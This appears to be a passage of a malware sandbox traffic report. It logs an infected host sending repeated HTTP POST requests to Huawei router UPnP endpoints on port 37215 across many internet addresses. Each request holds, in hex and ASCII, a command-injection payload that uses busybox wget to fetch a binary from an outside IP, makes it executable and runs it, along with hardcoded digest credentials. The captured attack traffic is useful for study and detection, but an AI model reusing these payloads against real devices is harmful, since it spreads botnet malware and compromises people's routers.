                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2113192.168.2.154525241.1.213.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669719934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2114192.168.2.155110441.187.180.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669868946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2115192.168.2.155559241.41.171.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669966936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2116192.168.2.153915041.77.197.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.669966936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2117192.168.2.153572041.16.238.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670000076 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2118192.168.2.155702041.16.73.4137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670008898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2119192.168.2.154338841.158.120.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670008898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2120192.168.2.153753641.32.155.16937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670030117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2121192.168.2.153586841.24.200.14637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670047045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2122192.168.2.155210041.74.191.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670058966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 